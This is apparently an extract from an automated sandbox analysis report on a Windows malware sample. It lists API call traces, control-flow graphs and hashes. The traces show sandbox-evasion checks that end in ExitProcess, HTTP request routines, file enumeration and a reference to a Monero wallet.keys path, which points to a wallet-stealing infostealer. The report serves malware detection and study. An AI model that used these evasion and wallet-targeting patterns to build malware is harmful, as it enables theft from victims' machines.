                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1698), ref: 00B098A1
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A15F0), ref: 00B098BA
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A14E8), ref: 00B098D2
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A15D8), ref: 00B098EA
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A16B0), ref: 00B09903
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A8C38), ref: 00B0991B
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,01895048), ref: 00B09933
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,01895068), ref: 00B0994C
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A16C8), ref: 00B09964
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1758), ref: 00B0997C
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1650), ref: 00B09995
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A1608), ref: 00B099AD
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,01895248), ref: 00B099C5
                            • Part of subcall function 00B09860: GetProcAddress.KERNEL32(76210000,018A15A8), ref: 00B099DE
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00AF11D0: ExitProcess.KERNEL32 ref: 00AF1211
                            • Part of subcall function 00AF1160: GetSystemInfo.KERNEL32(?), ref: 00AF116A
                            • Part of subcall function 00AF1160: ExitProcess.KERNEL32 ref: 00AF117E
                            • Part of subcall function 00AF1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AF112B
                            • Part of subcall function 00AF1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00AF1132
                            • Part of subcall function 00AF1110: ExitProcess.KERNEL32 ref: 00AF1143
                            • Part of subcall function 00AF1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AF123E
                            • Part of subcall function 00AF1220: ExitProcess.KERNEL32 ref: 00AF1294
                            • Part of subcall function 00B06770: GetUserDefaultLangID.KERNEL32 ref: 00B06774
                            • Part of subcall function 00AF1190: ExitProcess.KERNEL32 ref: 00AF11C6
                            • Part of subcall function 00B07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AF11B7), ref: 00B07880
                            • Part of subcall function 00B07850: RtlAllocateHeap.NTDLL(00000000), ref: 00B07887
                            • Part of subcall function 00B07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B0789F
                            • Part of subcall function 00B078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07910
                            • Part of subcall function 00B078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B07917
                            • Part of subcall function 00B078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B0792F
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00B06AF9
                          • Sleep.KERNEL32(00001770), ref: 00B06B04
                          • CloseHandle.KERNEL32(?,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06B1A
                          • ExitProcess.KERNEL32 ref: 00B06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: 95be88afb61da1637b3b1da83d5ff934b44449665a563602e8e96e67bb79e10b
                          • Instruction ID: 6b4493829b545af108a94eef09497d092e90f42397aaad58cd08ce4af4868c5a
                          • Opcode Fuzzy Hash: 95be88afb61da1637b3b1da83d5ff934b44449665a563602e8e96e67bb79e10b
                          • Instruction Fuzzy Hash: 5531FE71E10308AADB04FBF0DD56BFE7BB8AF14340F504998F252A61D2DF706945C6A6

                          Control-flow Graph

                          control_flow_graph 1436 b06af3 1437 b06b0a 1436->1437 1439 b06aba-b06ad7 call b0aad0 OpenEventA 1437->1439 1440 b06b0c-b06b22 call b06920 call b05b10 CloseHandle ExitProcess 1437->1440 1445 b06af5-b06b04 CloseHandle Sleep 1439->1445 1446 b06ad9-b06af1 call b0aad0 CreateEventA 1439->1446 1445->1437 1446->1440
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00B06AF9
                          • Sleep.KERNEL32(00001770), ref: 00B06B04
                          • CloseHandle.KERNEL32(?,00000000,?,018A8AC8,?,00B1110C,?,00000000,?,00B11110,?,00000000,00B10AEF), ref: 00B06B1A
                          • ExitProcess.KERNEL32 ref: 00B06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 251a43256525a76a83ade0a7ed5579de1053004da09aff8566e04bfd51e02650
                          • Instruction ID: 8ae935bc0fb1b0f032f9f7ee1db267f602040aa79c1a3a04d83ce959377a5cee
                          • Opcode Fuzzy Hash: 251a43256525a76a83ade0a7ed5579de1053004da09aff8566e04bfd51e02650
                          • Instruction Fuzzy Hash: DEF058B0B4030AABE710BBA0DC8ABBE7FB4EB04701F104994B503E12D1CBB09540DAA6

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 9703834ec422a689c793657f3045d5ec8008a8d2d5233309c6704bf0f719d273
                          • Instruction ID: 96ec91a0fe9b33175ecd0b9520514114996e6698233f4d6e7a701c554c8bd4a0
                          • Opcode Fuzzy Hash: 9703834ec422a689c793657f3045d5ec8008a8d2d5233309c6704bf0f719d273
                          • Instruction Fuzzy Hash: 75210EB1D00309ABDF14DFA4E845ADE7B75FB45320F108625F955A72D0EB706A09CB91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF6280: InternetOpenA.WININET(00B10DFE,00000001,00000000,00000000,00000000), ref: 00AF62E1
                            • Part of subcall function 00AF6280: StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF6303
                            • Part of subcall function 00AF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF6335
                            • Part of subcall function 00AF6280: HttpOpenRequestA.WININET(00000000,GET,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF6385
                            • Part of subcall function 00AF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AF63BF
                            • Part of subcall function 00AF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B05228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 8f288015c64e725de747b272d93d2bca49dd4ea640bbbc4595c9c64770d802fe
                          • Instruction ID: 03438a91d254b40a582b233435ce09a3e6850e3a4a7682c1a71cd393d2af30b6
                          • Opcode Fuzzy Hash: 8f288015c64e725de747b272d93d2bca49dd4ea640bbbc4595c9c64770d802fe
                          • Instruction Fuzzy Hash: F8110330910248ABDB14FF74DD56EED7BB8AF50300F908998F91A575D2EF31AB05CA91

                          Control-flow Graph

                          control_flow_graph 1493 af1220-af1247 call b089b0 GlobalMemoryStatusEx 1496 af1249-af1271 call b0da00 * 2 1493->1496 1497 af1273-af127a 1493->1497 1498 af1281-af1285 1496->1498 1497->1498 1501 af129a-af129d 1498->1501 1502 af1287 1498->1502 1504 af1289-af1290 1502->1504 1505 af1292-af1294 ExitProcess 1502->1505 1504->1501 1504->1505
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00AF123E
                          • ExitProcess.KERNEL32 ref: 00AF1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 722961d400d5233504500dc7034c4ce35fd8cc10673be638151da5dcc8fec180
                          • Instruction ID: 203872af2ede5cab03bdc93c3ba59be0c2bedc47ef5470dbbbea4689b019a2c1
                          • Opcode Fuzzy Hash: 722961d400d5233504500dc7034c4ce35fd8cc10673be638151da5dcc8fec180
                          • Instruction Fuzzy Hash: CF011DB0E4430CFAEB10EBE4CC49BEEBBB8AB14705F608459F705B62C0D77496458B99
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00AF112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00AF1132
                          • ExitProcess.KERNEL32 ref: 00AF1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: d61f089f688fb0583675f90f6c0ac44a30df6fcdae6439abbe22d6c96171b31a
                          • Instruction ID: 86b4597d8301a2fe8b15edf1cfeff6f538df724633fe839ff7ff7d2a86b9449e
                          • Opcode Fuzzy Hash: d61f089f688fb0583675f90f6c0ac44a30df6fcdae6439abbe22d6c96171b31a
                          • Instruction Fuzzy Hash: D5E0E670B4534CFBE7506BE4DD0EB197678AB04B01F104154F709B62D0D6B5264096A9
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00AF10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00AF10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: b247cc385a86bab197734e1601092e7bb8b734290cfd99778c34111a7a8d7630
                          • Instruction ID: bc7fb3ef8fa0b0994f9ce0c60d95eaa45da8a9a190bc67879f42aa934b425b16
                          • Opcode Fuzzy Hash: b247cc385a86bab197734e1601092e7bb8b734290cfd99778c34111a7a8d7630
                          • Instruction Fuzzy Hash: B2F0E2B1641308BBE7149BA8AC49FBAB7E8E705B15F301848F684E3280D9719F00CAA0
                          APIs
                            • Part of subcall function 00B078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B07910
                            • Part of subcall function 00B078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B07917
                            • Part of subcall function 00B078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B0792F
                            • Part of subcall function 00B07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00AF11B7), ref: 00B07880
                            • Part of subcall function 00B07850: RtlAllocateHeap.NTDLL(00000000), ref: 00B07887
                            • Part of subcall function 00B07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B0789F
                          • ExitProcess.KERNEL32 ref: 00AF11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 8c69ddfc0c2343d2a58f3be06c24c01b0f9eaf4d55045786d82670e54d1484a8
                          • Instruction ID: e4047bb1a297f6f61617ed7a22d0b2340c0ea4359f099d003f05e40b2fec63d4
                          • Opcode Fuzzy Hash: 8c69ddfc0c2343d2a58f3be06c24c01b0f9eaf4d55045786d82670e54d1484a8
                          • Instruction Fuzzy Hash: BBE012B6F5430553CA0073F5AC0BB2A3BDC6B14345F040568FA85D2682FE25F901857A
                          APIs
                          • wsprintfA.USER32 ref: 00B038CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00B038E3
                          • lstrcat.KERNEL32(?,?), ref: 00B03935
                          • StrCmpCA.SHLWAPI(?,00B10F70), ref: 00B03947
                          • StrCmpCA.SHLWAPI(?,00B10F74), ref: 00B0395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00B03C67
                          • FindClose.KERNEL32(000000FF), ref: 00B03C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 1bfc73cb6f7f54ebe84b94a54d0deea14f5a5233bd9381e136cf5e093c2803cf
                          • Instruction ID: 24e247416a98420456b30b7c6955462454c08e24b8f8ba38a2ea8be874e231f1
                          • Opcode Fuzzy Hash: 1bfc73cb6f7f54ebe84b94a54d0deea14f5a5233bd9381e136cf5e093c2803cf
                          • Instruction Fuzzy Hash: BDA131B1A003089BDB24DBA4DC89FEE77BCFB44700F4445C8A64D96191EB759B84CF62
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
